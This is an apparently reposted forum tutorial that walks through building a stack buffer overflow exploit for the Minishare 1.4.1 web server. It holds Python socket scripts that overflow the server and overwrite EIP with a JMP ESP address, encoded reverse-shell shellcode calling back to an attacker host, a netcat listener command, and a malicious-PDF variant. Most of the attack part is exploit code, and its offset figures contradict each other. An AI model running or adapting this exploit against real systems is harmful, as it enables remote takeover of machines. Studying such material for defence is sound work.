Members Login
Username 
 
Password 
    Remember Me  
home page -> 💀 𝒸ʸ𝐛ᵉℝ-匚𝑜𝐝€R C๏𝕞𝕞𝓤nᎥᵗY💀 -> ][®][^][®]دوره اختراق السيرفرات[ ][®][^][®][ -> Buffer is region of a memory that is used to temporarily hold data while it is being used or moved. Stack
Post Info TOPIC: Buffer is region of a memory that is used to temporarily hold data while it is being used or moved. Stack
cYber-coder


Senior Member

Status: Offline
Posts: 317
Date:
Buffer is region of a memory that is used to temporarily hold data while it is being used or moved. Stack
Permalink Closed

  Prestige: 107
Posts: 1,093
Joined: Nov 2012
Reputation: 128
Sapphire of Ub3rYouTube
[Image: M7IbPvb.jpg]

Imagine a glass of wine. You're thirsty and you want to drink it, but first you need to fill your glass. You keep pouring it into the glass, but at one point, the wine will have filled the glass and it will leak outside of it, on your carpet. This is exactly what buffer overflow is. It happens when a program or file writes data to a buffer and overflows it. It leaks into adjacent memory and overrides it. That way we get our malicious part to execute.

To understand Buffer Overflows, one must first understand buffers, stack, EIP & ESP registers.

Buffer


A stack is a specialized type of buffer which is used to store data. It stores it from the top to down. This means that as new requests enter it, they get stored on top, and they push everything else down. Stacks are used to pass data to various functions, and also as a space holders of variables. PUSH stores data and POP removes it.

ESP Register

If we wanted to access the stack memory we could you can use ESP. ESP is a stack pointer. It points at the top of the stack.

EIP Register


EIP Register is instruction pointer. Since code execution is not linear, we can call functions and skip parts of the code, we can use EIP and point it to the address that contains code that we want to execute next. Whatever EIP points to will be executed next.

Now that we've got that done, we can discuss tools that are required for exploitation. We will be using:
  • Metasploit Framework
  • Netcat for a listener
  • OllyDbg
  • Vulnerable Application

In this tutorial, I will be showing how to exploit Minishare 1.4.1. Please note that an exploit for this already exists and that we will be merely reconstructing the exploit from scratch. I am not his original creator. You can find original creator on ExploitDB.

Getting Ready

First thing we need to do is get the file ready for analysis. Download Minishare from link I provided above and install it. Download ollydbg and extract it. Since it doesn't need any installation just double click the file and it will run. Now, in OllyDbg open the file and get it ready for analysis. Do this by navigating to File>Open and then select path to your file.

PHP Code:
File>Open 

[Image: ChNo1my.png]

Now simply click open and that's it. Now, you are interested in:
  • CPU Window
  • Registry Window

[Image: xYOGtx3.png]

Even though we opened the file in OllyDbg it's still not executed. To run it, press F9 or just click on start button located at the top of ollydbg. This will run your file, and you will see this on your screen:

[Image: QtMgNwu.png]

Awesome. Now let's say a word or two about Networking.

Networking

We will be using Python to trigger and exploit the vulnerability for by using the socket module we can connect to the remote machine running the vulnerable application and send data to it. I highly recommend learning Python before doing any of this, because you won't understand it.

To import a module in Python, we use import command. Next, we have to connect to the remote machine on port 80 because that is the port the application is using. We can then send data to it in hope of causing a crash. In this case, we can accomplish it by sending overly large HTTP GET requests. They begin with GET and end with HTTP/1.1 and line breaks. Let's write our Python file. Open any text editor. Remember when you were a skid and people used to tell you that you can't hack with notepad? Today you can laugh at them because notepad is what we will use to write our python script. So technically, in a way, you hacked with notepad. How cool is that?

PHP Code:
import socket
soc = socket.socket()
soc.connect(("192.168.2.105", 80))

buf ="GET " + "\x41"*2000 + " HTTP/1.1
\n
\n"
soc.send(buf)
soc.close() 

So what are we doing? We are sending a huge HTTP GET request that consists of a lot of "A" characters. "\x41" is the hexadecimal value of the ASCII "A" character, and "
\n" is just a new line carriage return. We send two thousand "A" characters in hope of creating an error. And we did. At the very bottom of OllyDbg, we got access violation.

[Image: 4iPHm5W.png]

Also, we can see that EIP was overwritten:

[Image: gVVXz0R.png]

Taking Control


By causing an error we have just scratched the surface of Buffer Overflows because we have to find a way to tame the error and use it as we please. To do so, we want to find the opcode for JMP ESP.

Click on View menu in Olly and then select Executable Modules option. It will show us a new window containing all loaded executable modules. We can see minishare.exe and a lot of DLLs that it uses.

[Image: WrRO01c.png]

Select shell32.dll and click enter. However keep in mind when choosing that address of JMP ESP mustn't have null bytes so you must choose carefully. If it did have them, when we override EIP it would act as EOL (End of line) and it would stop our exploit from running. So make sure you don't choose anything that has \x00, \x0a or \x0d. Opening shell32.dll would present it in our CPU window. Now you want to press Control + F. This will prompt us for commands search. In it, type "JMP ESP" and press enter. Take note of the address on the left. It's 7C A5 82 65 in my case.

[Image: D2OquTI.png]

Now, you want to restart the program by going on Debug>Restart. Press F9 again to re-run it. This is important step and you won't be able to try your exploit if you don't restart it.

Next thing we want to do is find exact position at which EIP is overwritten. We will take advantage of tools that ship with metasploit framework. Fire up your Backtrack machine and in console type:

PHP Code:
ruby pattern_create.rb 2000 

Replace 2000 with size that you want.

[Image: sVZVm9o.png]

That is what we want to send to the victim. Edit your python script to do so.

PHP Code:
import socket
soc = socket.socket()
soc.connect(("192.168.2.105", 80))

buf ="GET " + "That long nasty code in the picture above" + " HTTP/1.1
\n
\n"

soc.send(buf)
soc.close() 

After sending it, EIP register and ESP register will change. You want to take value of EIP register and note it down. Do the same for ESP register.

[Image: rkOjXTK.png]

Now let's use offset_create tool to determine the exact size of the buffer that create the overflow.

PHP Code:
ruby pattern_create (EIP value)
ruby pattern_offset (ESP value) 

[Image: l7mToY8.png]

You will get two numbers. They will be fairly close to each other. First one is 1787 and other one is 1791. First one says that EBX is overwritten at 1787 bytes and second one that EIP is overwritten after 1791 bytes of data.

To show that this is in fact correct, I will demonstrate how EIP gets overridden after 1787 bytes of data. Everything before it is junk.

PHP Code:
import socket
soc = socket.socket()
soc.connect(("192.168.2.105", 80))

buf ="GET " + "\x41"*1787 + "\x42"*4 + " HTTP/1.1
\n
\n"

soc.send(buf)
soc.close() 

This will override EIP to be 42424242. Save the script and re-run it. Don't forget to restart the program in OllyDbg as well!

[Image: ADTu7uC.png]

As you can see it worked. We can now go ahead and add shellcode.

Shellcode

First, we need to open backtrack console. We will be using Metasploit payload windows/shell_reverse_tcp. So let's do:

PHP Code:
msfpayload windows/shell_reverse_tcp LHOST=192.168.20.11 LPORT=443 R 

But you will notice that it will include x00, x0d and x0a. If you remember, these are line breakers. When they get in EIP registry they will terminate the line and exploit will fail. That's why we have to encode this so it doesn't have these. We do it with MSFencode.

PHP Code:
msfpayload windows/shell_reverse_tcp LHOST=192.168.2.106 LPORT=4444 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c 

[Image: b2Y0iAI.png]

Shellcode will be generated. Now let's take a look at our python script again. After 1787 bytes of data, we want to input JMP ESP which has language and OS details. Remember that I told you to take note of address? It was 7C A5 82 65. We need to use little endian order. This means that we have to allocate bytes from least significant to most significant. So our original 7C A5 82 65 will reverse to 65 82 A5 7C. And after this, we will add our shellcode. But it's always nice to have NOPs (No operations) for stability. I'll add thirty bytes of these.

PHP Code:
import socket
soc = socket.socket()
soc.connect(("192.168.2.105", 80))

buf ="GET " + "\x41"*1787
buf+="\x65\x82\xA5\x7C" #JMP ESP
buf+="\x41"*30 #NOPs
buf+=("\xb8\x94\xf9\xf4\xb9\xdb\xdc\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x4f\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x76\x0c\x08\x51\xff"
"\xef\xf1\xa2\x9f\x66\x14\x93\x8d\x1d\x5c\x86\x01\x55\x30\x2b"
"\xea\x3b\xa1\xb8\x9e\x93\xc6\x09\x14\xc2\xe9\x8a\x99\xca\xa6"
"\x49\xb8\xb6\xb4\x9d\x1a\x86\x76\xd0\x5b\xcf\x6b\x1b\x09\x98"
"\xe0\x8e\xbd\xad\xb5\x12\xbc\x61\xb2\x2b\xc6\x04\x05\xdf\x7c"
"\x06\x56\x70\x0b\x40\x4e\xfa\x53\x71\x6f\x2f\x80\x4d\x26\x44"
"\x72\x25\xb9\x8c\x4b\xc6\x8b\xf0\x07\xf9\x23\xfd\x56\x3d\x83"
"\x1e\x2d\x35\xf7\xa3\x35\x8e\x85\x7f\xb0\x13\x2d\x0b\x62\xf0"
"\xcf\xd8\xf4\x73\xc3\x95\x73\xdb\xc0\x28\x50\x57\xfc\xa1\x57"
"\xb8\x74\xf1\x73\x1c\xdc\xa1\x1a\x05\xb8\x04\x23\x55\x64\xf8"
"\x81\x1d\x87\xed\xb3\x7f\xc0\xc2\x89\x7f\x10\x4d\x9a\x0c\x22"
"\xd2\x30\x9b\x0e\x9b\x9e\x5c\x70\xb6\x66\xf2\x8f\x39\x96\xda"
"\x4b\x6d\xc6\x74\x7d\x0e\x8d\x84\x82\xdb\x01\xd5\x2c\xb4\xe1"
"\x85\x8c\x64\x89\xcf\x02\x5a\xa9\xef\xc8\xed\xee\x78\x33\x45"
"\xf2\x12\xdb\x94\xf2\xf3\x47\x10\x14\x99\x67\x74\x8f\x36\x11"
"\xdd\x5b\xa6\xde\xcb\xcb\x4b\x4c\x90\x0b\x05\x6d\x0f\x5c\x42"
"\x43\x46\x08\x7e\xfa\xf0\x2e\x83\x9a\x3b\xea\x58\x5f\xc5\xf3"
"\x2d\xdb\xe1\xe3\xeb\xe4\xad\x57\xa4\xb2\x7b\x01\x02\x6d\xca"
"\xfb\xdc\xc2\x84\x6b\x98\x28\x17\xed\xa5\x64\xe1\x11\x17\xd1"
"\xb4\x2e\x98\xb5\x30\x57\xc4\x25\xbe\x82\x4c\x55\xf5\x8e\xe5"
"\xfe\x50\x5b\xb4\x62\x63\xb6\xfb\x9a\xe0\x32\x84\x58\xf8\x37"
"\x81\x25\xbe\xa4\xfb\x36\x2b\xca\xa8\x37\x7e")

buf+=" HTTP/1.1
\n
\n"

soc.send(buf)
soc.close() 

This is the final form of our exploit. Don't run it yet. You need to set up a listener that will listen for incoming connections and accept them. We will use netcat for listener this time. Open new backtrack console and type:

PHP Code:
nc -nvlp 4444 

Our local port is 4444. If your shellcode used something else, change it. You will have your session after running the exploit.

[Image: RlgWtkr.png]

Non socket exploits

What if you want to write an exploit similar to one in adobe reader?

PHP Code:
buf = open("C:\buffer.pdf", "a")
data = "\x41"*2000
buf.write(data)
buf.close() 

This will create a file in C drive called buffer.pdf and open it for appending. It will then write two thousand "A"s in it. What comes next is very similar to my previous example. Get exact number of bytes needed for EIP to be overwritten, JMP ESP & Shellcode.

PHP Code:
buf = open("C:\buffer.pdf", "a")
data="\x41"*1787
data+="\x65\x82\xA5\x7C" #JMP ESP
data+="\x41"*30 #NOPs
data+=("\xb8\x94\xf9\xf4\xb9\xdb\xdc\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x4f\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x76\x0c\x08\x51\xff"
"\xef\xf1\xa2\x9f\x66\x14\x93\x8d\x1d\x5c\x86\x01\x55\x30\x2b"
"\xea\x3b\xa1\xb8\x9e\x93\xc6\x09\x14\xc2\xe9\x8a\x99\xca\xa6"
"\x49\xb8\xb6\xb4\x9d\x1a\x86\x76\xd0\x5b\xcf\x6b\x1b\x09\x98"
"\xe0\x8e\xbd\xad\xb5\x12\xbc\x61\xb2\x2b\xc6\x04\x05\xdf\x7c"
"\x06\x56\x70\x0b\x40\x4e\xfa\x53\x71\x6f\x2f\x80\x4d\x26\x44"
"\x72\x25\xb9\x8c\x4b\xc6\x8b\xf0\x07\xf9\x23\xfd\x56\x3d\x83"
"\x1e\x2d\x35\xf7\xa3\x35\x8e\x85\x7f\xb0\x13\x2d\x0b\x62\xf0"
"\xcf\xd8\xf4\x73\xc3\x95\x73\xdb\xc0\x28\x50\x57\xfc\xa1\x57"
"\xb8\x74\xf1\x73\x1c\xdc\xa1\x1a\x05\xb8\x04\x23\x55\x64\xf8"
"\x81\x1d\x87\xed\xb3\x7f\xc0\xc2\x89\x7f\x10\x4d\x9a\x0c\x22"
"\xd2\x30\x9b\x0e\x9b\x9e\x5c\x70\xb6\x66\xf2\x8f\x39\x96\xda"
"\x4b\x6d\xc6\x74\x7d\x0e\x8d\x84\x82\xdb\x01\xd5\x2c\xb4\xe1"
"\x85\x8c\x64\x89\xcf\x02\x5a\xa9\xef\xc8\xed\xee\x78\x33\x45"
"\xf2\x12\xdb\x94\xf2\xf3\x47\x10\x14\x99\x67\x74\x8f\x36\x11"
"\xdd\x5b\xa6\xde\xcb\xcb\x4b\x4c\x90\x0b\x05\x6d\x0f\x5c\x42"
"\x43\x46\x08\x7e\xfa\xf0\x2e\x83\x9a\x3b\xea\x58\x5f\xc5\xf3"
"\x2d\xdb\xe1\xe3\xeb\xe4\xad\x57\xa4\xb2\x7b\x01\x02\x6d\xca"
"\xfb\xdc\xc2\x84\x6b\x98\x28\x17\xed\xa5\x64\xe1\x11\x17\xd1"
"\xb4\x2e\x98\xb5\x30\x57\xc4\x25\xbe\x82\x4c\x55\xf5\x8e\xe5"
"\xfe\x50\x5b\xb4\x62\x63\xb6\xfb\x9a\xe0\x32\x84\x58\xf8\x37"
"\x81\x25\xbe\xa4\xfb\x36\x2b\xca\xa8\x37\x7e")

buf.write(data)
buf.close() 

Please note that the code above was just a demonstration on how it should be made. The number of bytes that trigger the vulnerability are wrong and thus it won't work.


__________________
Page 1 of 1  sorted by
 
Quick Reply

Please log in to post quick replies.
home page -> 💀 𝒸ʸ𝐛ᵉℝ-匚𝑜𝐝€R C๏𝕞𝕞𝓤nᎥᵗY💀 -> ][®][^][®]دوره اختراق السيرفرات[ ][®][^][®][ -> Buffer is region of a memory that is used to temporarily hold data while it is being used or moved. Stack
Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse 		Powered by ActiveBoard